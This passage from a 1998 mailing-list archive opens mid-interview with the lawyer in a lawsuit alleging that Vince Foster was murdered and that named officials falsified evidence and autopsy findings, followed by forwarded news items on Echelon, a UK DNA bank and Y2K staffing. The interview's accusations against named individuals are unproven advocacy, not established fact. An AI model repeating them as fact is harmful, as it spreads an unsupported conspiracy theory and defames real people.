violation was part of a conspiracy. Under the law of civil conspiracy all
members of the conspiracy are liable and answerable for anything done in
furtherance of the conspiracy. If the civil rights violation was in
furtherance of a conspiracy, even if the defendants did not know who
Patrick Knowlton was, they are all liable for what happened to Patrick.
That is what we call the theory of the case and it's what we are
proceeding on. What we did today was file an amended complaint to
name additional defendants who were members of the conspiracy. Even
though these people did not know who Patrick Knowlton was, and even
though they did not personally harass him, they were a part of this joint
venture and that's why they are liable. 

Two things very relevant in the prosecution of Patrick's case are: (1) if
there was a cover-up surrounding the death of Vincent Foster; and (2)
who covered it up. About 10,000 pages of documents have been
released regarding the Foster death. We just recently completed our
review of these documents and got our summary down on paper. It's not
in its final form. But we are now in a position to find out who did what,
and what happened in the Vince Foster case. We have unraveled a lot of
it and that's why we added defendants in our amended complaint. 

The first defendant we added is U.S. Park Police sergeant now retired,
Robert Edwards. He was the third Park Police officer to respond to the
body site. As he was walking up to the body site the first Park Police
officer was leaving. Edwards ordered him to leave the park and return to
his duties. Edwards proceeded to the body site where Park Police officer
Franz Ferstl was photographing the body. Ferstl was the 'beat officer'; it
was his beat. He took about 7 photographs before Edwards got there.
Edwards then took Ferstl's photographs and sent Ferstl to the parking
lot. Then two other Park Police officers walked up to the body site, Lt.
Patrick Gavin and Christine Hodakievic. They stayed for a few minutes
and left. 

That left Edwards alone at the body site for about 10- 15 minutes, with
the only photographs that had been taken. Edwards then tampered with
the crime scene by moving the head to the right. This allowed blood that
had accumulated in the mouth to drain down onto the right shoulder. He
then repositioned the head straight up, leaving a contact stain on the right
side of the chin. The contact stain occurred when the chin hit the wet
shoulder. 

Edwards did that because he wanted to make it appear that the blood --
which was already on the right shoulder, right side of the shirt, and right
side of the neck and collar -- had come from the mouth. He wanted to
provide an excuse for that blood being there. You don't commit suicide
by shooting yourself in the neck, so they wanted to cover up the neck
wound. So the excuse for the blood on the right side, the OIC tells us, is
blood had accumulated in the mouth and an early observer turned the
head to the right, whereupon the blood drained out. Then this early
observer turned the head back up, leaving the contact stain on the chin.
That's right. He wanted to leave a sign of having moved the head,
because that's the excuse for the blood. His excuse for having moved the
head to the right was to open up an airway, although no one tried to
resuscitate Mr. Foster. 

We know Edwards moved the head because all of the observers before
Edwards said the blood was dry, and the witnesses after Edwards said
the blood was wet. The OIC never said who the early observer was, but
it was pretty obvious that they couldn't find anybody who said they did it
or saw it being done. So to the OIC this is an unknown person; they
didn't know who this person was, although it had to have been Edwards. 

This is important because officially there was no wound on the side of the
neck. Foster supposedly shot himself in the mouth. But he did not have
an entrance wound in his mouth. The entrance wound was on his neck.
The blood had drained from the neck. In order to conceal the entrance
wound in the neck, you have to conceal where the blood came from. So
Edwards turned the head to right to let the blood drain out, to provide an
explanation for the blood that was already there. This is also what caused
the two lateral drain tracks that came from his nose and mouth going
toward his ear. People say those tracks show he was moved to the park.
That's not really true. We believe that occurred from Edwards' actions
after the body was already at the park. 

QUESTION: Do you think Edwards was in the know about a need for
cover-up when he moved the head? 

CLARKE: You would think so, wouldn't you? 

QUESTION: His job was to do something to help cover this up? Is that
what you think? 

CLARKE: Yes, that's what I think. I don't think he all of a sudden, sua
sponte, did that on his own, with nobody telling him to. 

Anyway, the official version is that there was a mouth entrance wound
and an exit wound in the back of the head. But actually, there was no
entrance wound in the mouth, and there was no exit wound at the top of
the back of the head. There was only one visible wound from the outside,
and that was to the neck. 

QUESTION: How do you know that there was no entrance wound in
the mouth? 

CLARKE: Let's do the entrance and exit wounds at the same time.
Twenty-five witnesses saw the body before the autopsy. There is a
record of not one of them having seen an entrance wound. 

QUESTION: Well, they would not have opened the mouth, would they? 

CLARKE: That's true, although two of those persons were MD's whose
job it was to inspect the body. But there is no record of any of those 25
witnesses having seen either the mouth entrance wound or the exit wound
at the top of the head. The only reference is to officer Ferstl, who
allegedly saw an exit wound. Five Park Police officers all prepared
reports and in none of those reports was there a reference to an entrance
wound, an exit wound, or blood. 

QUESTION: I thought Dr. Haut stated he saw matted blood at the back
of the head. 

CLARKE: He did say matted blood at the top of the head. 

QUESTION: I thought he said the back of the head. 

CLARKE: Right, the top of the back of the head, where you would
expect this alleged exit wound to be. He did see blood there. But the
best evidence we have is the Park Police officer who gloved up and felt
there. That was Officer John Rolla. He said a big hole would be one he
could put his finger through. He said, "His head was not blown out. I
probed his head and there was no big hole there, there was no big
blowout. There weren't brains running all over the place. There was
blood in there, there was a mushy spot. I initially thought that the bullet
might still be in his head." He uses the word hole, but that's not what he
described as what he felt. He said if you could put your finger in it, that's
a big hole. He says he couldn't put his finger through any hole. 

QUESTION: But he did mention a hole being present, didn't he? 

CLARKE: No, although he used the word hole in general terms, he what
he says found at the back of the head was a mushy spot. A mushy spot is
not a hole. There was blood back there. What we think happened is the
bullet, after it entered under the right jaw line, went straight up and
fractured the top of the back of the head. It remained in the head. John
Rolla does not describe an exit wound, and Richard Arthur said there
was no exit wound. 

QUESTION: Who is Richard Arthur? 

CLARKE: He was in the group of the 4th to 7th people at the scene.
First on the scene was the U.S. Park Police officer, then one EMT and a
paramedic, then minutes later came Richard Arthur accompanied by 3
others. Richard Arthur was the only paramedic in that group of four. He
was the second paramedic at the body site. 

Arthur said that there was no exit wound. He was asked if he could
describe the exit wound. He said, "Was there one? I didn't know there
was one." That's the other record we have pertaining to an exit wound.
The only person we have not covered for whom there is a record of
being there is Dr. Haut. Haut said that there was a neck wound. He
wrote in his report "gunshot wound mouth-neck." 

QUESTION: That's on the second page of his report, isn't it? 

CLARKE: Yes. 

QUESTION: The first page of the report has a spot where a word,
presumably 'neck,' is evidently whited out, and another word inserted --
'head' is inserted instead. Is that correct? 

CLARKE: That report has Dr. Haut's signature on it. It is dated July 20,
1993. It is verified. It has an "I hereby certify and affirm under the laws of
the Commonwealth of Virginia," and it goes on and on. He says in effect
"I swear that I undertook an investigation of the circumstances
surrounding the death and this is what I found." Under "circumstances
surrounding death," it says, "U.S. Park Police found a gunshot victim,
mouth to neck." That's not an error. If you are the medical examiner
you're not going to say there's a neck wound unless there is. Haut's
statement is the only record of an exterior wound that anyone of 25
witnesses saw. 

Richard Arthur was interviewed five times and the best record we have
of what it was he saw was in his deposition, with no opportunity by the
FBI to spin or edit his account. He is asked the following question in the
deposition, and I'm quoting: "Let me ask you this: if I told you there was
no gunshot wound in the neck, would that change your view as to
whether it was a suicide or not?" And he responded, "No . . . what I saw
is what I saw . . . I saw a small - what appeared to be a small gunshot
wound here near the jawline. Fine, whether the coroner's report says that
or not, fine. I know what I saw." 

QUESTION: Let me make sure I understand. The only reference to a
head wound, other than a "mushy spot," would be on the first page of
Haut's report. Is that correct? 

CLARKE: Yes, on the first page. The first page says "Cause of death" in
a small area. In there it says "gunshot wound" on one line. Then "gunshot
wound" with a dash and then right under it some little black marks with
no word there, and then to the right of that it says "head." So it looks like
it originally said "gunshot wound mouth" then under it, centered properly,
was the word "neck." In order to falsify it they whited-out the word
"neck" and moved the paper a bit to the side, and then typed "head." The
reason they moved it over was because otherwise they would have to
type over the whited-out word, which would have been apparent on the
photocopies. If you type over white-out you can tell. 

QUESTION: What did the autopsy report say about the head wound? 

CLARKE: We have just covered all the witnesses up till you get to the
autopsy. The body was found on Tuesday around 6:00 p.m. The autopsy
was originally scheduled to occur Thursday at 7:00 a.m. Dr. Beyer
claimed that he rescheduled the autopsy as soon as he heard about the
case, from 7:00 a.m. on Thursday to 10:00 a.m. on Wednesday. He
rescheduled it for just 16 hours after the discovery of the body. He said it
was his idea, he didn't talk to anyone about it, no one suggested it, he just
decided to do it. 

QUESTION: Where are the records of what he said? 

CLARKE: That comes from his Senate testimony. Both of the Park
Police investigators on the case, Rolla and Cheryl Braun, had called the
Office of the Medical Examiner for Northern Virginia, Dr. Beyer's office,
Wednesday morning as they were getting off work. Rolla testified that he
waited instead of leaving work at 6:00 a.m. He said he waited until about
6:30 before calling the Medical Examiner's Office. The reason he waited
was he wanted to call to make sure they weren't going to do the autopsy
that day. They told him over the phone, "Don't worry, it won't be done till
the following day." So he went home . . . 

QUESTION: Why did he not want it done on Wednesday? 

CLARKE: There is a requirement that law enforcement officers attend an
autopsy. So he was calling to make sure he would be available to be
there, because he had just worked all night. So he went home. Braun's
story is pretty much the same. Then they both got a call about 8:30 or
9:00 saying, "We're going to have the autopsy at 10:00. Do you want to
go?" And they said "No." Four other Park Police officers attended the
autopsy instead. Normally Dr. Beyer would perform the autopsy or Dr.
Fields would. But in this case, an unknown person assisted Dr. Beyer in
the autopsy. 

QUESTION: Have you found out who that person was? 

CLARKE: No, he's named as a "John Doe pathologist" in our suit. 

QUESTION: Isn't that strange? 

CLARKE: It gets more strange. Four Park Police officers, Robert Rule
and three other personnel, go to the autopsy to witness it. There is Dr.
Beyer with his unknown, unusual assistant, whose identity is never
revealed in 10,000 pages of records. According to his deposition Robert
Rule asked Dr. Beyer who the assistant was, and Beyer refused to tell
him. He would not identify the guy who was helping him with the autopsy
to the police who were there! 

The autopsy was scheduled for 10:00, but Dr. Beyer began much earlier
than that, before the police arrived. He stripped the body, x-rayed it, and
then of all things to do he took out the tongue and portions of the soft
palate. The reason he did that, we allege, is to hide the fact that the bullet
pierced the tongue from below, and the absence of an entrance wound in
the soft palate. 

QUESTION: Is he then named as one of the new defendants in the
case? 

CLARKE: Yes, Dr. James Beyer. 

QUESTION: How about the mystery person? 

CLARKE: Yes, we call him "John Doe Pathologist." 

QUESTION: When you name somebody like that in a suit who is not
previously identified in the records, will that person's identity have to be
disclosed? Will they be required by the court now to come forward with
this person's identity? 

CLARKE: Not until discovery. We have to do discovery. 

QUESTION: You will get it through discovery? 

CLARKE: Oh, yes. 

QUESTION: You think you will? 

CLARKE: Sure. 

QUESTION: What if they say 'National Security'? 

CLARKE: (Laughs). They won't be saying that. This is the Medical
Examiner for Northern Virginia, who covered up . . . 'national security'?
They might say that but I don't think they will get away with it. We'll find
out a lot. But the astounding stuff is what we already know. Let me
continue on with the autopsy. 

There is also testimony that Dr. Beyer did not photograph the entrance
wound -- that portion of the soft palate that allegedly had the entrance
wound. Why would he not photograph that? In addition, he reported that
on the soft palate there were very large amounts of what he called
"gunpowder debris." He said it was "grossly present," meaning it could be
seen with the naked eye. He described it as "large quantities of powder
debris." He sent his 5 slides containing 13 sections of the soft palate to
the Virginia Department of Forensic Sciences. They issued a report
saying there was no ball-shaped gunpowder identified on any of those
tissue samples. 

QUESTION: When did you learn of the existence of this report? 

CLARKE: Somebody told me about it nearly a year ago. This is a very
interesting thing. The finding of powder debris on the soft palate by Dr.
Beyer is the absolute cornerstone of the entire official conclusion of
suicide in the park. 

QUESTION: That Vince Foster stuck a gun in his mouth and pulled the
trigger? 

CLARKE: Right. That is the cornerstone of the official conclusion. Now,
this Virginia Department of Forensic Science report said that no
ball-shaped gunpowder -- and ball-shaped gunpowder is the type of
powder allegedly found by Beyer -- was found. The FBI laboratory
issued a report on May 9 or 10 of 1994, which said no ball-shaped
gunpowder was identified on the tissue samples when the Office of the
Northern Virginia Medical Examiner examined them. And they didn't
really have an explanation. In June, about a month later, they issued
another lab report saying the tissue samples had been prepared in such a
way as not to be conducive to retaining unconsumed gunpowder
particles. In other words, it had been put in something -- formaldehyde
or something - - which made it disappear. 

That's a lie. That didn't happen. Depending on the type of ball smokeless
powder, the solvents, in order to destroy it, would have to be either ether
or nitroglycerin. People just don't use that to preserve tissue samples. So
Beyer was lying. And remember, that's the cornerstone of the entire
conclusion. 

When we look at everything we've just talked about, the only word we
have about this entrance and exit wound is from Dr. Beyer. You would
think out of 25 witnesses before the autopsy -- an autopsy which is
screwy from the start -- there would be some record of the entrance or
exit wound other than the neck wound, if it existed. It did not exist until
you get to the autopsy, and Dr. Beyer falsified his autopsy. 

QUESTION: Ambrose Evans-Pritchard claimed he was shown a
photograph of the neck wound, correct? 

CLARKE: Correct. Ambrose told me that; I've asked him. 

QUESTION: Have you been able to track down this photo? 

CLARKE: No. 

QUESTION: Where do you think the photo might be? 

CLARKE: I don't know. 

QUESTION: Do you know who the last person would have been to
have it? 

CLARKE: I have a couple of suspects. He was shown the photograph,
so you have to ask yourself who showed it to him. 

QUESTION: Haut? 

CLARKE: No, no. I think it was XXXXX [redacted by request]. 

QUESTION: Who else have you added to your list of defendants? 

CLARKE: After "John Doe Pathologist," next is Robert F. Bryant. At the
time of Mr. Foster's death, Bryant was Special Agent in Charge of the
FBI's Washington Metropolitan Field Office. He has since been
promoted to Deputy Director, FBI. On Friday, July 23, 1993, three days
after the death, he sent a Teletype to then Acting Director of the FBI,
Floyd Clark. Clark was the Acting Director because Sessions had been
fired a week before. Accuracy in Media got this Teletype, which is
heavily redacted, through a Freedom of Information lawsuit. What it
shows is that Bryant was sending it to confirm telephone conversations
that took place on the 21st, the day after the death. He says something
like, "This is to confirm our conversation wherein the preliminary results
of the autopsy are that there was a .38 caliber gunshot wound with no
exit wound." 

QUESTION: He said no exit wound? 

CLARKE: He confirmed the conversation with Floyd Clark in which he
said there was no exit wound. On August 10th, about 17 days after he
sent the Teletype, he appeared at a joint Park Police/FBI press
conference to announce the FBI's finding of suicide in the park. He told
everyone there a very thorough investigation showed it was a suicide in
the park. His having done that constitutes his participation in the
conspiracy. He is telling the American people, the press, that it was
suicide in the park. Seventeen days earlier he confirmed his guilty
knowledge of no exit wound. And this is the Special Agent in charge of
the Washington D. C. Metropolitan Field Office. 

QUESTION: What did Dr. Beyer's report say about an exit wound? 

CLARKE: He said it was 1 x 1.5 inch, which is about the size of a
half-dollar. Remember, it wasn't there earlier; John Rolla could have put
his finger through something the size of a half-dollar. But that's what
Beyer said. He said he put a probe through the head, and there is a
record of one of the Park Police officers having seen the probe going in
through the mouth and coming out through the back of the head. 

QUESTION: Did the Park Police officer sign a statement that he saw
that? 

CLARKE: No, but I believe that he did see that. But that Park Police
officer didn't get there until after Beyer had done God knows what to the
body. He's reported as having removed the tongue and portions of the
soft palate before the officers got there. I think he inserted the probe
before the officers got there. They walked in and saw the probe, then he
took it out. 

QUESTION: So you think he may have drilled a hole in the back of the
head to be able to put the probe through? 

CLARKE: I think the bullet went up through Mr. Foster's tongue into the
top of his head, and fractured his head. So Rolla said "I felt a mushy
spot, I thought the head was fractured, and I thought the bullet was still in
the head." He's right on all three counts is what I think. 

QUESTION: OK, Bryant is also named because in his memo to . . . 

CLARKE: There is a record of his active participation in the cover-up. 

QUESTION: Who else besides Bryant are you naming? 

CLARKE: There's Scott Jeffrey Bickett. Scott bashed Patrick's car in
with a tire iron the night before his second FBI interview. One of the
appendices at the back of Evans-Pritchard's "The Secret Life of Bill
Clinton" is a computer printout of Scott Jeffrey Bickett, showing that he
was employed by the Department of Defense. [3] He holds what is
called an "active SCI" security clearance. SCI stands for "Sensitive
Compartmented Information." That's a top U.S. government security
clearance. So this malicious attack on Patrick's car, which Bickett later
confessed to . . . 

QUESTION: He did? To whom did he confess? 

CLARKE: Coincidentally, to the U.S. Park Police who were handling
the case. They said they couldn't trace the license plate number. Luckily,
there was a limousine driver not too far away who witnessed the whole
thing, who wrote it down. 

QUESTION: Did he tell them why he bashed the car? 

CLARKE: No. So, the Park Police showed up and the limo driver gave
the license number to both the Park Police and to Patrick. A week went
by and they said they couldn't find the guy. So a private investigator was
hired on October 18, 1995, and he found Bickett in one day. The Park
Police then interviewed Bickett and he confessed. This incident was
pretty damned coincidental. It was the night before Patrick's second
interview. Patrick had two interviews. The first one was April 15, 1994,
when FBI agent Larry Monroe was leaning on him trying to get him to
admit the car he saw in the Fort Marcy Park parking lot was Vince
Foster's car. Patrick had another interview about 3 weeks later. The
incident where his car was bashed in was the night before the second
interview. He actually had a confrontation with this guy, Scott Bickett. 

Either they were trying to give Patrick a hint, or they were trying to shake
him up. His car was a 1974 refurbished Peugeot. It was just beautiful. It
was Patrick's only possession. They bashed the shit out of it right in front
of the Vietnam Memorial. Patrick and his girlfriend were showing another
couple the memorial. 

QUESTION: When did you learn of Bickett? 

CLARKE: When Evans-Pritchard's book came out. 

QUESTION: Why did you not name Bickett as a defendant to begin
with? 

CLARKE: Because we filed suit a year before that book came out. The
next new defendant I call "John Doe FBI Laboratory Technician." I'll tell
you briefly some of the things they hid. Remember, Beyer supposedly
found ball shaped smokeless powder on the body. Well, Remington
manufactured the cartridges found in the official death gun. They were
.38 HVL, which stands for high velocity ammunition. Remington has
never used ball smokeless powder in the manufacture of that ammunition.

QUESTION: So the supposed finding of the ball shaped powder on the
soft palate by Beyer is impossible in any event? 

CLARKE: I think Foster had ball powder on him, but none of it was in
the mouth. 

QUESTION: Does the presence of this particular type of powder give
you any indication what the murder weapon actually was? 

CLARKE: Yes. It's used by Winchester .22's, a small caliber gun. 

QUESTION: Whoa!! 

CLARKE: Yes, it's consistent with reloads also. 

QUESTION: Professional hit men are known to reload their ammunition.

CLARKE: That category is included. 

QUESTION: Although it seems unlikely to me that anyone would want
to reload .22 cartridges, unless they wanted very special properties. But
a professional might. 

CLARKE: Right, for up close work. The FBI lab also hid the length of
the powder burns on Mr. Foster's hands. They did not describe the
length of those powder burns. 

QUESTION: Is the official story that he had one hand over the cylinder
of the gun as he pulled the trigger? 

CLARKE: Right. And you would get a blast from the front cylinder gap. 

QUESTION: Well, on a revolver there are gaps between the cylinder
and the frame at both the front and the back of the cylinder, where some
blast might escape. 

CLARKE: You could get a little bit from the back, but these powder
burns on his hands were definitely from the front cylinder gap, and they
are huge. As the blast escapes from the cylinder gap, it is blocked at the
top and the bottom by the frame of the gun. So it comes out in a
triangular shape on both sides from the front cylinder gap, which is at the
back of the barrel. As the blast flees from the gun, it expands, so the
triangle gets larger the farther it is from the point of the blast. 

If your hand is over the cylinder when you pull the trigger, you won't get
gunshot residue on the part of your hand that is above the gun, or the part
that is below the gun. The top and bottom of the gun frame will protect
those parts of your hand. Now, if you wrap your hand around the gun at
the front of the cylinder, according to our measurements, you will have
two 2-inch burns on your hand, one on each side of the cylinder. 

QUESTION: Exactly right. 

CLARKE: Let's suppose you got somebody else to pull the trigger. You
take both hands and wrap them around the gun, but not touching the gun.
With your hands out like that, instead of 2 inches long the burns are going
to be 6 to 7 inches long. The gunshot residue deposit is shortened by
closeness of your hand to the gun and lengthened by its distance. Now,
we calculate that Mr. Foster had a 3-inch burn on the left-hand side, so
he was not touching the gun there. 

QUESTION: OK. 

CLARKE: On the right hand side he had over a 5-inch burn. 

QUESTION: So his hands were not touching the gun? 

CLARKE: On neither side. He was not holding that gun. 

QUESTION: What's he doing with his hands around but not touching a
gun that goes off? 

CLARKE: Think about it. He's in a defensive posture. The gun went off
when his hand was two inches from it on the right hand side and on the
left side maybe a half an inch. He was grabbing for the gun when it went
off! 

QUESTION: How do you know how long the burns were on each
hand? 

CLARKE: We can approximate the size of his hand. He was 6 feet 4,
and he could palm a basketball palm down in each hand. Anybody who
can do that has a 6-inch index finger. 

QUESTION: How do you know the length of the burns? 

CLARKE: We have sources in the record that tell us the burn began at
the last phalange, which is about an inch long. It extended down into the
web area of his hand. From the beginning of the last phalange to the web
area would have been 5 inches. If the burn extended into the web area,
that means it was more than 5 inches. One of the reports -- Simonello's
-- says it is also to the thumb. Simonello removed the weapon from Mr.
Foster's right hand. He said there was gunpowder on the thumb. That
means the hand could not have been in contact with the weapon when it
went off. 

QUESTION: Was his stain also the ball shaped powder? 

CLARKE: We don't know because it is residue. 

QUESTION: Is it possible that someone put the .38 in his hand and shot
the gun to make it look like he shot it? 

CLARKE: No. 

QUESTION: But the .38 had been fired, had it not? It had a spent
casing in it didn't it? 

CLARKE: One spent casing and one unspent casing. 

QUESTION: Did they do a test of the gun to see if it had been fired
recently? 

CLARKE: I don't know. I do know that they didn't test it until after they
closed the investigation. Did you know that? 

QUESTION: No. Good grief. 

CLARKE: In fact the letter requesting testing was not written until the
11th, but the case was officially closed on the 5th. A week later they
decided to send it out for testing. That was the official FBI/Park Police
investigation, which was 16 days long. 

QUESTION: Why have you added "John Doe FBI lab Technician" to
your suit? 

CLARKE: Because of the FBI report. He says the gunpowder residues
are consistent with Foster having fired the weapon. We made a model of
the weapon. You cannot pull the trigger with your hands in the position
relative the gun that Foster's must have been. His right hand was 2 inches
away from it, and the left hand about one half inch". The only way he
could have been holding it would be with his hands around it and away
from it. You can't pull the trigger like that. Even if he could reach the
trigger, he couldn't have pulled it -- it was too far away. 

QUESTION: Was he supposed to have pulled the trigger with his
thumb? 

CLARKE: Yes. 

QUESTION: So you name the FBI lab technician because he falsified
the documents, in your opinion? 

CLARKE: Yes. 

QUESTION: What you are talking about here -- you've said it yourself
more than once -- is a conspiracy that involves many, many people. 

CLARKE: Many people, but less than some might imagine. 

QUESTION: It's hard for the average person to contemplate that all of
these disparate people would be involved to falsify the record. Why
would they do that? 

CLARKE: They were evidently covering up an apparent homicide. I
don't know why they did it, why he was killed, or who killed him. 

QUESTION: What's the next step in your suit? 

CLARKE: The judge still has not ruled on the defendants' motion to
dismiss. The two FBI agents and one other named defendant who was
served in the case earlier filed a motion to dismiss. We argued that in
January. The judge has not ruled on it. It's a good thing, too, because we
have been going through thousands of pages of records pulling all of this
stuff out. 

QUESTION: I won't ask you if you trust the judge. 

CLARKE: You can say that I trust him because I do. 

QUESTION: What is his name? 

CLARKE: John Garrett Penn. 

QUESTION: Which court is the case in? 

CLARKE: U.S. District Court for the District of Columbia. 

QUESTION: Has he been there for a while? 

CLARKE: He's been there for a long time. I tried a case before him in
1989. 

QUESTION: I suppose the next step is he will make a ruling about
whether to dismiss. And if he does not dismiss, he will then look at your
amended complaint. Is that right? 

CLARKE: He really has to look at the amended complaint before ruling.
Part of the argument of the motion to dismiss is our supposed failure to
particularize the allegation of conspiracy. Our amended complaint is a lot
more particular. So he would not want to dismiss the suit without looking
at this. 

QUESTION: You think at this point with the evidence you have
presented you have overcome that objection? 

CLARKE: Yes, I thought I overcame it back then, but even more so
now. 

QUESTION: How is Patrick Knowlton doing? 

CLARKE: He's doing very well. 

QUESTION: Is he getting on with his life? 

CLARKE: We are both involved in this up to our armpits, so this is his
life for the time being. 

QUESTION: I know you are getting along partly on donations, so give
us the address to contribute to this cause. 

CLARKE: The Knowlton Legal Fund, 1730 K Street NW, Suite 304,
Washington, D.C. 20006. Donations are not tax deductible. 

 Notes

1. For more information on the Knowlton lawsuit, see an earlier
Washington Weekly interview with John Clarke at:
http://www.federal.com/feb16-98/Foster. 

2. The amended complaint in the lawsuit is available at:
http://www.aim.org/special/knowlton.htm 

3. Ambrose Evans-Pritchard, "The Secret Life of Bill Clinton," p. 416. 

 Wesley Phelan may be reached at wphlen@mtco.com 


 Published in the Oct. 26, 1998 issue of The Washington Weekly. Copyright (c)
 1998 The Washington Weekly (http://www.federal.com). Reposting permitted
with this message intact.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Oct 1998 12:38:03 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Congress to Get Echelon Briefing
Message-ID: <199810290400.UAA14829@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Congress to Get Echelon Briefing
Date: Wed, 28 Oct 1998 11:10:30 -0600
To: believer@telepath.com

Source:  Wired
http://www.wired.com/news/news/politics/story/15864.html

Spying on the Spies
 by Niall McKay 

 12:55 p.m.27.Oct.98.PST
 A Washington DC civil liberties organization will
 send a detailed report on the National Security
 Agency's top-secret spying network to members
 of Congress later this week. 

 The report, Echelon: America's Spy in the Sky,
 details the known history and workings of the
 agency's global electronic surveillance system.
 The system is reportedly able to intercept,
 record, and translate any electronic
 communication -- such as telephone, data,
 cellular, fax, email, telex -- sent throughout the
 world. 

 "There is a real and present threat to the
 security of the US from its enemies," said
 Patrick Poole, author of the report and deputy
 director of the Free Congress Foundation. "But
 there needs to be some democratic and
 constitutional oversight of how and against who
 the [Echelon] system is being used." 

 The Free Congress Foundation is hoping that
 Congress will scrutinize Echelon as carefully as
 the European Parliament has. The parliament
 commissioned several reports on Echelon earlier
 this year and the issue has been hotly debated
 ever since. 

 The NSA neither confirms nor denies Echelon's
 existence, but investigative journalists and civil
 liberties activists have turned up a number of
 details in recent years. 

 Glyn Ford, a British member of the European
 Parliament, said he sees the necessity of
 Echelon but, like Poole, he worries about the
 NSA's apparent lack of accountability. 

 "If we are going to leave the electronic key under
 the doormat, then we want an assurance that
 the people who pick up that key are not going to
 steal the family silver," said Ford. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Oct 1998 12:33:10 +0800
To: cypherpunks@cyberpass.net
Subject: IP: DNA bank launched as science spending rises
Message-ID: <199810290400.UAA14849@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: DNA bank launched as science spending rises
Date: Wed, 28 Oct 1998 11:35:31 -0600
To: believer@telepath.com

Source:  London Telegraph
http://www.telegraph.co.uk:80/et?ac=000150689433551&rtmo=kokJeebp&atmo=99999
999&P4_FOLLOW_ON=/98/10/28/ndna28.html&pg=/et/98/10/28/ndna28.html

DNA bank launched as science spending rises
 By Roger Highfield, Science Editor 

 A NATIONAL collection of 100,000 human DNA samples is to be
 assembled so drugs can be customised and people at risk from allergies,
 drug side-effects and serious illnesses can be identified.

 The 12 million plan to study the genetic landscape of the British
population,
 which includes funding to address ethical concerns, is part of a major
shift in
 the emphasis of science spending announced by the Government yesterday.
 Funding for particle physics and astronomy remains almost level while there
 is a major boost for biotechnology and molecular biology, despite the rise in
 public concern about issues such as genetically-modified food.

 Announcing the science budget allocation, Peter Mandelson, Secretary of
 State for Trade and Industry, said the overall 15 per cent increase by
 2001/02 was "solid evidence" of Government efforts to reverse the recent
 decline in spending on science, which it sees as underpinning the economy.

 The rise was announced as part of the Comprehensive Spending Review. Mr
 Mandelson said the science budget "received the largest percentage increase
 compared with all departmental budgets".

 Yesterday's allocations saw Mr Mandelson increase funding of the Medical
 Research Council (MRC) and Biotechnology and Biological Sciences
 Research Council.

 The news comes only days after America's National Human Genome
 Research Institute announced that the three-billion "letter" human genetic
 code - the genome - will be deciphered by 2003, two years earlier than
 thought. Now Britain is preparing to rise to this "post-genome challenge" by
 studying how this code varies across the British population.

 The DNA database project will be backed by the MRC, which will see its
 support rise from 290 million in 1998/09 to 334 million in 2001/02, and is
 being developed by Prof David Porteous of the MRC Human Genetics Unit
 in Edinburgh, and Prof Nick Day of the MRC Biostatistics Unit in
 Cambridge.

 The first step will be to collate information on 60,000 blood samples that
 have already been collected, for instance in studies of inherited
diseases, then
 extend the collection to people who have taken part in long-term health
 studies, some dating back more than half a century.

 Prof George Radda, MRC's chief executive, said: "In the first wave, we are
 talking of the order of 100,000 samples, then it will be extended." He
 emphasised that there were "major ethical concerns".

 By comparing the genetic blueprints of people who suffer disease, genes
 increasing the risk of illness can be identified, said Prof Porteous. He
said:
 "This is the surest way of digging out the really significant genetic
factors.
 They will be the basis of efforts to design new drugs and preventive
 measures."

 One ethical issue will be whether drug companies will be allowed to use the
 data to design drugs for a particular genetic group. The information will
also
 help doctors advise those at risk of heart disease or cancer, or to identify
 those at risk of drug side-effects.

(c) Copyright of Telegraph Group Limited 1998.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Oct 1998 12:25:20 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Wanted: Y2K Workers
Message-ID: <199810290400.UAA14871@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Wanted: Y2K Workers
Date: Wed, 28 Oct 1998 11:44:53 -0600
To: believer@telepath.com

Source:  Government Executive Magazine
http://www.govexec.com/dailyfed/1098/102898b2.htm

DAILY BRIEFING

Y2K poses personnel challenges for agencies

By Brian Friel
bfriel@govexec.com

As the deadline for fixing Y2K problems in federal computer
systems draws closer, agencies are struggling to recruit and
retain information technology personnel to deal with the
millennium bug.

In a new study, "Year 2000 Computing Crisis: Status of Efforts
to Deal with Personnel Issues" (GGD-99-14), the General
Accounting Office reports that the high demand for
programmers in both the public and private sectors is making
the difficult job of repairing all federal computers even harder.

"As awareness of the criticality of the year 2000 problem
grows throughout government and industry, there is a chance
that competition for limited skilled personnel will increase. If
this more vigorous competition occurs, the government may
find it increasingly difficult to obtain and retain the skilled
personnel needed to correct its mission critical systems in time,"
GAO said.

In some agencies, the personnel problem has already surfaced.

